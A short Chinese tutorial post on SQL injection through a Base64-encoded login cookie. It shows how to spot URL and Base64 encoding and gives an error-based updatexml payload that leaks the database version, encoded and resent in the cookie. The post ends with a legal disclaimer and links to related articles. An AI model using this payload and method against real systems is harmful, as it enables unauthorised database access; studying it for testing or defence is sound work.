sql注入碰到加密数据怎么办

简介: sql注入碰到加密数据怎么办

一、抓取登录数据包,cookie处有加密数据


0a2653c851af460fa595bd959398a8f1.png


二、判断加密方式


1、%3D,是“=”的URL编码,一般“%+两位十六进制数字”都是URL编码


0eacb84100b54626af849e6b562bf92a.png


2、前面一堆乱码后面“=”结尾的,首先考虑Base64编码


2d65d23f6d4748949b924e4057485923.png


三、构造注入语句


1、获取数据库版本信息

' or updatexml(1,concat(0x7e,(version()),0x7e),0) or '

2、将上面语句base64编码


2e9b90b2ca334476abebe75bafe6eeaa.png


3、将编码后的内容写入封包,重新发送


4cebaac233b3433da32a72337a77fc60.png


4、爆出数据库版本信息


6de278e6d6694ce5bb08e7e842b7e74b.png


禁止非法,后果自负


目录
相关文章
|
7天前
|
SQL Web App开发 安全
【less-1】基于SQLI的SQL字符型报错注入
【less-1】基于SQLI的SQL字符型报错注入
14 2
|
7天前
|
SQL 安全 PHP
基于PHPCMS的SQL注入(Havij)
基于PHPCMS的SQL注入(Havij)
15 1
|
7天前
【干货】sql-labs、请求方式、注入类型、拼接方式
【干货】sql-labs、请求方式、注入类型、拼接方式
8 0
|
1天前
|
SQL druid Java
传统后端SQL数据层替代解决方案: 内置数据源+JdbcTemplate+H2数据库 详解
传统后端SQL数据层替代解决方案: 内置数据源+JdbcTemplate+H2数据库 详解
7 1
|
6天前
|
SQL 监控 安全
代码审计-PHP原生开发篇&SQL注入&数据库监控&正则搜索&文件定位&静态分析
代码审计-PHP原生开发篇&SQL注入&数据库监控&正则搜索&文件定位&静态分析
|
4天前
|
SQL 数据库
零基础学习数据库SQL语句之操作表中数据的DML语句
零基础学习数据库SQL语句之操作表中数据的DML语句
7 0
零基础学习数据库SQL语句之操作表中数据的DML语句
|
7天前
|
SQL Web App开发 前端开发
【less-11】基于SQLI的POST字符型SQL注入
【less-11】基于SQLI的POST字符型SQL注入
17 2
|
7天前
|
SQL 开发框架 安全
【干货】如何判断 Sql 注入点
【干货】如何判断 Sql 注入点
12 1
|
1天前
|
SQL Java 关系型数据库
Java与数据库连接技术JDBC关键核心之PreparedStatement以及SQL注入演示解决和原理
Java与数据库连接技术JDBC关键核心之PreparedStatement以及SQL注入演示解决和原理
6 0
|
2天前
|
SQL 分布式计算 大数据
MaxCompute产品使用问题之如何使用MaxCompute SQL客户端删除分区数据
MaxCompute作为一款全面的大数据处理平台,广泛应用于各类大数据分析、数据挖掘、BI及机器学习场景。掌握其核心功能、熟练操作流程、遵循最佳实践,可以帮助用户高效、安全地管理和利用海量数据。以下是一个关于MaxCompute产品使用的合集,涵盖了其核心功能、应用场景、操作流程以及最佳实践等内容。